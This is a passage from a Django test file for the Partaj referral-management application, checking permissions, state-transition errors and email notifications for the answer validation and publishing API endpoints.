    self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 0)
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.RECEIVED)
    mock_mailer_send.assert_not_called()
def test_referral_request_answer_validation_from_assigned_state(
    self, mock_mailer_send
):
    """
    A referral still in the ASSIGNED state rejects answer validation
    requests with an explicit transition error.
    """
    member = factories.UserFactory()
    referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
    answer = factories.ReferralAnswerFactory(
        referral=referral, state=models.ReferralAnswerState.DRAFT
    )
    referral.units.get().members.add(member)
    validator = factories.UserFactory()
    token = Token.objects.get_or_create(user=member)[0]

    response = self.client.post(
        f"/api/referrals/{referral.id}/request_answer_validation/",
        {"answer": answer.id, "validator": validator.id},
        HTTP_AUTHORIZATION=f"Token {token}",
    )

    self.assertEqual(response.status_code, 400)
    self.assertEqual(
        response.json(),
        {
            "errors": [
                "Transition REQUEST_ANSWER_VALIDATION not allowed from state assigned."
            ]
        },
    )
    # Nothing was created and the referral did not move.
    self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 0)
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
    mock_mailer_send.assert_not_called()
def test_referral_request_answer_validation_from_answered_state(
    self, mock_mailer_send
):
    """
    A referral already in the ANSWERED state rejects answer validation
    requests with an explicit transition error.
    """
    member = factories.UserFactory()
    referral = factories.ReferralFactory(state=models.ReferralState.ANSWERED)
    answer = factories.ReferralAnswerFactory(
        referral=referral, state=models.ReferralAnswerState.DRAFT
    )
    referral.units.get().members.add(member)
    validator = factories.UserFactory()
    token = Token.objects.get_or_create(user=member)[0]

    response = self.client.post(
        f"/api/referrals/{referral.id}/request_answer_validation/",
        {"answer": answer.id, "validator": validator.id},
        HTTP_AUTHORIZATION=f"Token {token}",
    )

    self.assertEqual(response.status_code, 400)
    self.assertEqual(
        response.json(),
        {
            "errors": [
                "Transition REQUEST_ANSWER_VALIDATION not allowed from state answered."
            ]
        },
    )
    # Nothing was created and the referral did not move.
    self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 0)
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.ANSWERED)
    mock_mailer_send.assert_not_called()
def test_referral_request_answer_validation_from_closed_state(
    self, mock_mailer_send
):
    """
    A referral in the CLOSED state rejects answer validation requests
    with an explicit transition error.
    """
    member = factories.UserFactory()
    referral = factories.ReferralFactory(state=models.ReferralState.CLOSED)
    answer = factories.ReferralAnswerFactory(
        referral=referral, state=models.ReferralAnswerState.DRAFT
    )
    referral.units.get().members.add(member)
    validator = factories.UserFactory()
    token = Token.objects.get_or_create(user=member)[0]

    response = self.client.post(
        f"/api/referrals/{referral.id}/request_answer_validation/",
        {"answer": answer.id, "validator": validator.id},
        HTTP_AUTHORIZATION=f"Token {token}",
    )

    self.assertEqual(response.status_code, 400)
    self.assertEqual(
        response.json(),
        {
            "errors": [
                "Transition REQUEST_ANSWER_VALIDATION not allowed from state closed."
            ]
        },
    )
    # Nothing was created and the referral did not move.
    self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 0)
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.CLOSED)
    mock_mailer_send.assert_not_called()

# PERFORM ANSWER VALIDATION TESTS
def test_referral_perform_answer_validation_by_anonymous_user(
    self, mock_mailer_send
):
    """
    Unauthenticated requests cannot perform an answer validation: the API
    returns 401 and records nothing.
    """
    referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
    validation_request = factories.ReferralAnswerValidationRequestFactory(
        answer=factories.ReferralAnswerFactory(
            referral=referral, state=models.ReferralAnswerState.DRAFT
        )
    )

    # No HTTP_AUTHORIZATION header: the caller is anonymous.
    response = self.client.post(
        f"/api/referrals/{referral.id}/perform_answer_validation/",
        {
            "comment": "some comment",
            "state": "validated",
            "validation_request": validation_request.id,
        },
    )

    self.assertEqual(response.status_code, 401)
    self.assertEqual(
        models.ReferralAnswerValidationResponse.objects.all().count(), 0
    )
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
    mock_mailer_send.assert_not_called()
def test_referral_perform_answer_validation_by_random_logged_in_user(
    self, mock_mailer_send
):
    """
    A logged-in user with no link to the referral gets a 403 and no
    validation response is recorded.
    """
    bystander = factories.UserFactory()
    referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
    validation_request = factories.ReferralAnswerValidationRequestFactory(
        answer=factories.ReferralAnswerFactory(
            referral=referral, state=models.ReferralAnswerState.DRAFT
        )
    )
    token = Token.objects.get_or_create(user=bystander)[0]

    response = self.client.post(
        f"/api/referrals/{referral.id}/perform_answer_validation/",
        {
            "comment": "some comment",
            "state": "validated",
            "validation_request": validation_request.id,
        },
        HTTP_AUTHORIZATION=f"Token {token}",
    )

    self.assertEqual(response.status_code, 403)
    self.assertEqual(
        models.ReferralAnswerValidationResponse.objects.all().count(), 0
    )
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
    mock_mailer_send.assert_not_called()
def test_referral_perform_answer_validation_by_linked_user(self, mock_mailer_send):
    """
    The referral's own requester cannot perform an answer validation:
    the API returns 403 and records nothing.
    """
    requester = factories.UserFactory()
    referral = factories.ReferralFactory(
        state=models.ReferralState.IN_VALIDATION, user=requester
    )
    validation_request = factories.ReferralAnswerValidationRequestFactory(
        answer=factories.ReferralAnswerFactory(
            referral=referral, state=models.ReferralAnswerState.DRAFT
        )
    )
    token = Token.objects.get_or_create(user=requester)[0]

    response = self.client.post(
        f"/api/referrals/{referral.id}/perform_answer_validation/",
        {
            "comment": "some comment",
            "state": "validated",
            "validation_request": validation_request.id,
        },
        HTTP_AUTHORIZATION=f"Token {token}",
    )

    self.assertEqual(response.status_code, 403)
    self.assertEqual(
        models.ReferralAnswerValidationResponse.objects.all().count(), 0
    )
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
    mock_mailer_send.assert_not_called()
def test_referral_perform_answer_validation_by_linked_unit_member(
    self, mock_mailer_send
):
    """
    Unit membership alone does not grant the right to perform a validation:
    a member who is not the designated validator gets a 403.
    """
    member = factories.UserFactory()
    referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
    validation_request = factories.ReferralAnswerValidationRequestFactory(
        answer=factories.ReferralAnswerFactory(
            referral=referral, state=models.ReferralAnswerState.DRAFT
        )
    )
    referral.units.get().members.add(member)
    token = Token.objects.get_or_create(user=member)[0]

    response = self.client.post(
        f"/api/referrals/{referral.id}/perform_answer_validation/",
        {
            "comment": "some comment",
            "state": "validated",
            "validation_request": validation_request.id,
        },
        HTTP_AUTHORIZATION=f"Token {token}",
    )

    self.assertEqual(response.status_code, 403)
    self.assertEqual(
        models.ReferralAnswerValidationResponse.objects.all().count(), 0
    )
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
    mock_mailer_send.assert_not_called()
def test_referral_perform_answer_validation_by_requested_validator_does_validate(
    self, mock_mailer_send
):
    """
    The user who is linked with the validation can validate the answer, regardless of
    their membership of the linked unit.
    """
    referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
    # Add an assignee to make sure they receive the relevant email
    assignee = factories.UnitMembershipFactory(unit=referral.units.get()).user
    referral.assignees.set([assignee])
    validation_request = factories.ReferralAnswerValidationRequestFactory(
        answer=factories.ReferralAnswerFactory(
            referral=referral,
            state=models.ReferralAnswerState.DRAFT,
        )
    )
    # Authenticate as the designated validator for the request.
    user = validation_request.validator
    response = self.client.post(
        f"/api/referrals/{referral.id}/perform_answer_validation/",
        {
            "comment": "some comment",
            "state": "validated",
            "validation_request": validation_request.id,
        },
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    # Validation succeeds; the referral remains in IN_VALIDATION.
    self.assertEqual(response.status_code, 200)
    self.assertEqual(response.json()["state"], models.ReferralState.IN_VALIDATION)
    self.assertEqual(
        models.ReferralAnswerValidationResponse.objects.all().count(), 1
    )
    # Make sure the validation response was built with the data we expect
    validation_request.refresh_from_db()
    self.assertEqual(
        validation_request.response.state,
        models.ReferralAnswerValidationResponseState.VALIDATED,
    )
    self.assertEqual(validation_request.response.comment, "some comment")
    # A VALIDATED activity points back to the validation request.
    self.assertEqual(
        models.ReferralActivity.objects.get(
            verb=models.ReferralActivityVerb.VALIDATED
        ).item_content_object.id,
        validation_request.id,
    )
    self.assertIsNotNone(validation_request.response)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
    # The assignee is notified by email with this exact payload.
    mock_mailer_send.assert_called_with(
        {
            "params": {
                "case_number": referral.id,
                "link_to_referral": (
                    f"https://partaj/app/unit/{referral.units.get().id}"
                    f"/referrals-list/referral-detail/{referral.id}"
                ),
                "requester": referral.requester,
                "topic": referral.topic.name,
                "unit_name": referral.units.get().name,
                "validator": validation_request.validator.get_full_name(),
            },
            "replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
            "templateId": settings.SENDINBLUE[
                "REFERRAL_ANSWER_VALIDATED_TEMPLATE_ID"
            ],
            "to": [{"email": assignee.email}],
        }
    )
def test_referral_perform_answer_validation_by_requested_validator_does_not_validate(
    self, mock_mailer_send
):
    """
    The user who is linked with the validation can deny validation of the answer, regardless
    of their membership of the linked unit.
    """
    referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
    # Add an assignee to make sure they receive the relevant email
    assignee = factories.UnitMembershipFactory(unit=referral.units.get()).user
    referral.assignees.set([assignee])
    validation_request = factories.ReferralAnswerValidationRequestFactory(
        answer=factories.ReferralAnswerFactory(
            referral=referral,
            state=models.ReferralAnswerState.DRAFT,
        )
    )
    # Authenticate as the designated validator for the request.
    user = validation_request.validator
    response = self.client.post(
        f"/api/referrals/{referral.id}/perform_answer_validation/",
        {
            "comment": "some other comment",
            "state": "not_validated",
            "validation_request": validation_request.id,
        },
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    # Denial succeeds; the referral remains in IN_VALIDATION.
    self.assertEqual(response.status_code, 200)
    self.assertEqual(response.json()["state"], models.ReferralState.IN_VALIDATION)
    self.assertEqual(
        models.ReferralAnswerValidationResponse.objects.all().count(), 1
    )
    # Make sure the validation response was built with the data we expect
    validation_request.refresh_from_db()
    self.assertEqual(
        validation_request.response.state,
        models.ReferralAnswerValidationResponseState.NOT_VALIDATED,
    )
    self.assertEqual(validation_request.response.comment, "some other comment")
    # A VALIDATION_DENIED activity points back to the validation request.
    self.assertEqual(
        models.ReferralActivity.objects.get(
            verb=models.ReferralActivityVerb.VALIDATION_DENIED
        ).item_content_object.id,
        validation_request.id,
    )
    self.assertIsNotNone(validation_request.response)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
    # The assignee is notified by email with this exact payload.
    mock_mailer_send.assert_called_with(
        {
            "params": {
                "case_number": referral.id,
                "link_to_referral": (
                    f"https://partaj/app/unit/{referral.units.get().id}"
                    f"/referrals-list/referral-detail/{referral.id}"
                ),
                "requester": referral.requester,
                "topic": referral.topic.name,
                "unit_name": referral.units.get().name,
                "validator": validation_request.validator.get_full_name(),
            },
            "replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
            "templateId": settings.SENDINBLUE[
                "REFERRAL_ANSWER_NOT_VALIDATED_TEMPLATE_ID"
            ],
            "to": [{"email": assignee.email}],
        }
    )
def test_referral_perform_answer_validation_with_nonexistent_request(
    self, mock_mailer_send
):
    """
    Posting a validation for a request id that matches no record yields an
    explicit 400 error, even for a linked unit member.
    """
    member = factories.UserFactory()
    referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
    answer = factories.ReferralAnswerFactory(
        referral=referral, state=models.ReferralAnswerState.DRAFT
    )
    answer.referral.units.get().members.add(member)
    missing_request_id = uuid.uuid4()
    token = Token.objects.get_or_create(user=member)[0]

    response = self.client.post(
        f"/api/referrals/{answer.referral.id}/perform_answer_validation/",
        {
            "comment": "some comment",
            "state": "validated",
            "validation_request": missing_request_id,
        },
        HTTP_AUTHORIZATION=f"Token {token}",
    )

    self.assertEqual(response.status_code, 400)
    self.assertEqual(
        response.json()["errors"],
        [f"validation request {missing_request_id} does not exist"],
    )
    # Nothing was created and the referral did not move.
    self.assertEqual(
        models.ReferralAnswerValidationResponse.objects.all().count(), 0
    )
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
    mock_mailer_send.assert_not_called()
def test_referral_perform_answer_validation_from_received_state(
    self, mock_mailer_send
):
    """
    Even with an existing validation request, a referral in the RECEIVED
    state rejects the perform-validation transition.
    """
    referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
    validation_request = factories.ReferralAnswerValidationRequestFactory(
        answer=factories.ReferralAnswerFactory(
            referral=referral, state=models.ReferralAnswerState.DRAFT
        )
    )
    validator = validation_request.validator
    token = Token.objects.get_or_create(user=validator)[0]

    response = self.client.post(
        f"/api/referrals/{referral.id}/perform_answer_validation/",
        {
            "comment": "some other comment",
            "state": "not_validated",
            "validation_request": validation_request.id,
        },
        HTTP_AUTHORIZATION=f"Token {token}",
    )

    self.assertEqual(response.status_code, 400)
    self.assertEqual(
        response.json(),
        {
            "errors": [
                "Transition PERFORM_ANSWER_VALIDATION not allowed from state received."
            ]
        },
    )
    # No response object was attached and nothing else changed.
    self.assertEqual(
        models.ReferralAnswerValidationResponse.objects.all().count(), 0
    )
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    self.assertFalse(hasattr(validation_request, "response"))
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.RECEIVED)
    mock_mailer_send.assert_not_called()
def test_referral_perform_answer_validation_from_assigned_state(
    self, mock_mailer_send
):
    """
    Even with an existing validation request, a referral in the ASSIGNED
    state rejects the perform-validation transition.
    """
    referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
    validation_request = factories.ReferralAnswerValidationRequestFactory(
        answer=factories.ReferralAnswerFactory(
            referral=referral, state=models.ReferralAnswerState.DRAFT
        )
    )
    validator = validation_request.validator
    token = Token.objects.get_or_create(user=validator)[0]

    response = self.client.post(
        f"/api/referrals/{referral.id}/perform_answer_validation/",
        {
            "comment": "some other comment",
            "state": "not_validated",
            "validation_request": validation_request.id,
        },
        HTTP_AUTHORIZATION=f"Token {token}",
    )

    self.assertEqual(response.status_code, 400)
    self.assertEqual(
        response.json(),
        {
            "errors": [
                "Transition PERFORM_ANSWER_VALIDATION not allowed from state assigned."
            ]
        },
    )
    # No response object was attached and nothing else changed.
    self.assertEqual(
        models.ReferralAnswerValidationResponse.objects.all().count(), 0
    )
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    self.assertFalse(hasattr(validation_request, "response"))
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
    mock_mailer_send.assert_not_called()
def test_referral_perform_answer_validation_from_processing_state(
    self, mock_mailer_send
):
    """
    Even with an existing validation request, a referral in the PROCESSING
    state rejects the perform-validation transition.
    """
    referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
    validation_request = factories.ReferralAnswerValidationRequestFactory(
        answer=factories.ReferralAnswerFactory(
            referral=referral, state=models.ReferralAnswerState.DRAFT
        )
    )
    validator = validation_request.validator
    token = Token.objects.get_or_create(user=validator)[0]

    response = self.client.post(
        f"/api/referrals/{referral.id}/perform_answer_validation/",
        {
            "comment": "some other comment",
            "state": "not_validated",
            "validation_request": validation_request.id,
        },
        HTTP_AUTHORIZATION=f"Token {token}",
    )

    self.assertEqual(response.status_code, 400)
    self.assertEqual(
        response.json(),
        {
            "errors": [
                "Transition PERFORM_ANSWER_VALIDATION not allowed from state processing."
            ]
        },
    )
    # No response object was attached and nothing else changed.
    self.assertEqual(
        models.ReferralAnswerValidationResponse.objects.all().count(), 0
    )
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    self.assertFalse(hasattr(validation_request, "response"))
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.PROCESSING)
    mock_mailer_send.assert_not_called()
def test_referral_perform_answer_validation_from_answered_state(
    self, mock_mailer_send
):
    """
    Even with an existing validation request, a referral in the ANSWERED
    state rejects the perform-validation transition.
    """
    referral = factories.ReferralFactory(state=models.ReferralState.ANSWERED)
    validation_request = factories.ReferralAnswerValidationRequestFactory(
        answer=factories.ReferralAnswerFactory(
            referral=referral, state=models.ReferralAnswerState.DRAFT
        )
    )
    validator = validation_request.validator
    token = Token.objects.get_or_create(user=validator)[0]

    response = self.client.post(
        f"/api/referrals/{referral.id}/perform_answer_validation/",
        {
            "comment": "some other comment",
            "state": "not_validated",
            "validation_request": validation_request.id,
        },
        HTTP_AUTHORIZATION=f"Token {token}",
    )

    self.assertEqual(response.status_code, 400)
    self.assertEqual(
        response.json(),
        {
            "errors": [
                "Transition PERFORM_ANSWER_VALIDATION not allowed from state answered."
            ]
        },
    )
    # No response object was attached and nothing else changed.
    self.assertEqual(
        models.ReferralAnswerValidationResponse.objects.all().count(), 0
    )
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    self.assertFalse(hasattr(validation_request, "response"))
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.ANSWERED)
    mock_mailer_send.assert_not_called()
def test_referral_perform_answer_validation_from_closed_state(
    self, mock_mailer_send
):
    """
    Even with an existing validation request, a referral in the CLOSED
    state rejects the perform-validation transition.
    """
    referral = factories.ReferralFactory(state=models.ReferralState.CLOSED)
    validation_request = factories.ReferralAnswerValidationRequestFactory(
        answer=factories.ReferralAnswerFactory(
            referral=referral, state=models.ReferralAnswerState.DRAFT
        )
    )
    validator = validation_request.validator
    token = Token.objects.get_or_create(user=validator)[0]

    response = self.client.post(
        f"/api/referrals/{referral.id}/perform_answer_validation/",
        {
            "comment": "some other comment",
            "state": "not_validated",
            "validation_request": validation_request.id,
        },
        HTTP_AUTHORIZATION=f"Token {token}",
    )

    self.assertEqual(response.status_code, 400)
    self.assertEqual(
        response.json(),
        {
            "errors": [
                "Transition PERFORM_ANSWER_VALIDATION not allowed from state closed."
            ]
        },
    )
    # No response object was attached and nothing else changed.
    self.assertEqual(
        models.ReferralAnswerValidationResponse.objects.all().count(), 0
    )
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    self.assertFalse(hasattr(validation_request, "response"))
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.CLOSED)
    mock_mailer_send.assert_not_called()

# PUBLISH ANSWER TESTS
def test_publish_referral_answer_by_anonymous_user(self, mock_mailer_send):
    """
    Unauthenticated requests cannot publish a draft answer: 401, nothing
    published, state unchanged.
    """
    referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
    answer = factories.ReferralAnswerFactory(
        referral=referral, state=models.ReferralAnswerState.DRAFT
    )
    self.assertEqual(models.ReferralAnswer.objects.count(), 1)

    # No HTTP_AUTHORIZATION header: the caller is anonymous.
    response = self.client.post(
        f"/api/referrals/{referral.id}/publish_answer/",
        {"answer": answer.id},
    )

    self.assertEqual(response.status_code, 401)
    # Still only the draft: no published copy was created.
    self.assertEqual(models.ReferralAnswer.objects.count(), 1)
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.PROCESSING)
    mock_mailer_send.assert_not_called()
def test_publish_referral_answer_by_random_logged_in_user(self, mock_mailer_send):
    """
    A logged-in user unrelated to the referral cannot publish a draft
    answer: 403, nothing published, state unchanged.
    """
    bystander = factories.UserFactory()
    referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
    answer = factories.ReferralAnswerFactory(
        referral=referral, state=models.ReferralAnswerState.DRAFT
    )
    self.assertEqual(models.ReferralAnswer.objects.count(), 1)
    token = Token.objects.get_or_create(user=bystander)[0]

    response = self.client.post(
        f"/api/referrals/{referral.id}/publish_answer/",
        {"answer": answer.id},
        HTTP_AUTHORIZATION=f"Token {token}",
    )

    self.assertEqual(response.status_code, 403)
    # Still only the draft: no published copy was created.
    self.assertEqual(models.ReferralAnswer.objects.count(), 1)
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.PROCESSING)
    mock_mailer_send.assert_not_called()
def test_publish_referral_answer_by_linked_user(self, mock_mailer_send):
    """
    The referral's own requester cannot publish a draft answer: 403,
    nothing published, state unchanged.
    """
    requester = factories.UserFactory()
    referral = factories.ReferralFactory(
        state=models.ReferralState.PROCESSING, user=requester
    )
    answer = factories.ReferralAnswerFactory(
        referral=referral, state=models.ReferralAnswerState.DRAFT
    )
    self.assertEqual(models.ReferralAnswer.objects.count(), 1)
    token = Token.objects.get_or_create(user=requester)[0]

    response = self.client.post(
        f"/api/referrals/{referral.id}/publish_answer/",
        {"answer": answer.id},
        HTTP_AUTHORIZATION=f"Token {token}",
    )

    self.assertEqual(response.status_code, 403)
    # Still only the draft: no published copy was created.
    self.assertEqual(models.ReferralAnswer.objects.count(), 1)
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.PROCESSING)
    mock_mailer_send.assert_not_called()
def test_publish_referral_answer_by_linked_unit_member(self, mock_mailer_send):
    """
    Members of the linked unit can publish a draft answer for a referral.
    """
    user = factories.UserFactory()
    referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
    answer = factories.ReferralAnswerFactory(
        referral=referral,
        state=models.ReferralAnswerState.DRAFT,
    )
    referral.units.get().members.add(user)
    # Attach two files to the draft so we can check they are carried over
    # to the published copy.
    attachment_1 = factories.ReferralAnswerAttachmentFactory()
    attachment_1.referral_answers.add(answer)
    attachment_2 = factories.ReferralAnswerAttachmentFactory()
    attachment_2.referral_answers.add(answer)
    answer.refresh_from_db()
    self.assertEqual(answer.attachments.count(), 2)
    response = self.client.post(
        f"/api/referrals/{answer.referral.id}/publish_answer/",
        {"answer": answer.id},
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    # Publishing succeeds and moves the referral to ANSWERED. The response
    # lists the published copy first, then the original draft.
    self.assertEqual(response.status_code, 200)
    self.assertEqual(response.json()["state"], models.ReferralState.ANSWERED)
    self.assertEqual(response.json()["answers"][0]["content"], answer.content)
    self.assertEqual(
        response.json()["answers"][0]["state"], models.ReferralAnswerState.PUBLISHED
    )
    self.assertEqual(
        len(response.json()["answers"][0]["attachments"]),
        2,
    )
    self.assertEqual(response.json()["answers"][1]["content"], answer.content)
    self.assertEqual(
        response.json()["answers"][1]["state"], models.ReferralAnswerState.DRAFT
    )
    # Make sure the published answer was added to the related draft
    published_answer = models.ReferralAnswer.objects.get(
        id=response.json()["answers"][0]["id"]
    )
    answer.refresh_from_db()
    self.assertEqual(answer.published_answer, published_answer)
    self.assertEqual(published_answer.attachments.count(), 2)
    # An activity was created for this published answer
    self.assertEqual(
        str(
            models.ReferralActivity.objects.get(
                verb=models.ReferralActivityVerb.ANSWERED
            ).item_content_object.id
        ),
        response.json()["answers"][0]["id"],
    )
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.ANSWERED)
    # The requester is notified by email with this exact payload.
    mock_mailer_send.assert_called_with(
        {
            "params": {
                "answer_author": answer.created_by.get_full_name(),
                "case_number": referral.id,
                "link_to_referral": f"https://partaj/app/sent-referrals/referral-detail/{referral.id}",
                "referral_topic_name": referral.topic.name,
            },
            "replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
            "templateId": settings.SENDINBLUE["REFERRAL_ANSWERED_TEMPLATE_ID"],
            "to": [{"email": referral.user.email}],
        }
    )
def test_publish_nonexistent_referral_answer_by_linked_unit_member(
    self, mock_mailer_send
):
    """
    Publishing an answer id that matches no record yields an explicit 400
    error, even for a linked unit member.
    """
    member = factories.UserFactory()
    referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
    referral.units.get().members.add(member)
    missing_answer_id = uuid.uuid4()
    self.assertEqual(models.ReferralAnswer.objects.count(), 0)
    token = Token.objects.get_or_create(user=member)[0]

    response = self.client.post(
        f"/api/referrals/{referral.id}/publish_answer/",
        {"answer": missing_answer_id},
        HTTP_AUTHORIZATION=f"Token {token}",
    )

    self.assertEqual(response.status_code, 400)
    self.assertEqual(
        response.json()["errors"], [f"answer {missing_answer_id} does not exist"]
    )
    # Nothing was created and the referral did not move.
    self.assertEqual(models.ReferralAnswer.objects.count(), 0)
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.PROCESSING)
    mock_mailer_send.assert_not_called()
def test_publish_referral_answer_from_in_validation_state(self, mock_mailer_send):
    """
    A referral in the IN_VALIDATION state can go through the publish answer transition.
    """
    user = factories.UserFactory()
    referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
    answer = factories.ReferralAnswerFactory(
        referral=referral,
        state=models.ReferralAnswerState.DRAFT,
    )
    referral.units.get().members.add(user)
    response = self.client.post(
        f"/api/referrals/{answer.referral.id}/publish_answer/",
        {"answer": answer.id},
        HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
    )
    # Publishing succeeds and moves the referral to ANSWERED. The response
    # lists the published copy first, then the original draft.
    self.assertEqual(response.status_code, 200)
    self.assertEqual(response.json()["state"], models.ReferralState.ANSWERED)
    self.assertEqual(response.json()["answers"][0]["content"], answer.content)
    self.assertEqual(
        response.json()["answers"][0]["state"], models.ReferralAnswerState.PUBLISHED
    )
    self.assertEqual(response.json()["answers"][1]["content"], answer.content)
    self.assertEqual(
        response.json()["answers"][1]["state"], models.ReferralAnswerState.DRAFT
    )
    # Make sure the published answer was added to the related draft
    published_answer = models.ReferralAnswer.objects.get(
        id=response.json()["answers"][0]["id"]
    )
    answer.refresh_from_db()
    self.assertEqual(answer.published_answer, published_answer)
    # An activity was created for this published answer
    self.assertEqual(
        str(
            models.ReferralActivity.objects.get(
                verb=models.ReferralActivityVerb.ANSWERED
            ).item_content_object.id
        ),
        response.json()["answers"][0]["id"],
    )
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.ANSWERED)
    # The requester is notified by email with this exact payload.
    mock_mailer_send.assert_called_with(
        {
            "params": {
                "answer_author": answer.created_by.get_full_name(),
                "case_number": referral.id,
                "link_to_referral": f"https://partaj/app/sent-referrals/referral-detail/{referral.id}",
                "referral_topic_name": referral.topic.name,
            },
            "replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
            "templateId": settings.SENDINBLUE["REFERRAL_ANSWERED_TEMPLATE_ID"],
            "to": [{"email": referral.user.email}],
        }
    )
def test_publish_referral_answer_from_received_state(self, mock_mailer_send):
    """
    The publish-answer transition is not allowed while the referral is
    still in the RECEIVED state.
    """
    member = factories.UserFactory()
    referral = factories.ReferralFactory(state=models.ReferralState.RECEIVED)
    answer = factories.ReferralAnswerFactory(
        referral=referral, state=models.ReferralAnswerState.DRAFT
    )
    referral.units.get().members.add(member)
    token = Token.objects.get_or_create(user=member)[0]

    response = self.client.post(
        f"/api/referrals/{answer.referral.id}/publish_answer/",
        {"answer": answer.id},
        HTTP_AUTHORIZATION=f"Token {token}",
    )

    self.assertEqual(response.status_code, 400)
    self.assertEqual(
        response.json(),
        {"errors": ["Transition PUBLISH_ANSWER not allowed from state received."]},
    )
    # Still only the draft: no published copy, no activity, no state change.
    self.assertEqual(models.ReferralAnswer.objects.count(), 1)
    self.assertEqual(models.ReferralActivity.objects.count(), 0)
    referral.refresh_from_db()
    self.assertEqual(referral.state, models.ReferralState.RECEIVED)
    mock_mailer_send.assert_not_called()
def test_publish_referral_answer_from_assigned_state(self, mock_mailer_send):
"""
A referral in the ASSIGNED state cannot go through the publish answer transition.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.ASSIGNED)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
referral.units.get().members.add(user)
response = self.client.post(
f"/api/referrals/{answer.referral.id}/publish_answer/",
{"answer": answer.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Transition PUBLISH_ANSWER not allowed from state assigned."]},
)
self.assertEqual(models.ReferralAnswer.objects.count(), 1)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.ASSIGNED)
mock_mailer_send.assert_not_called()
def test_publish_referral_answer_from_answered_state(self, mock_mailer_send):
"""
A referral in the ANSWERED state cannot go through the publish answer transition.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.ANSWERED)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
referral.units.get().members.add(user)
response = self.client.post(
f"/api/referrals/{answer.referral.id}/publish_answer/",
{"answer": answer.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
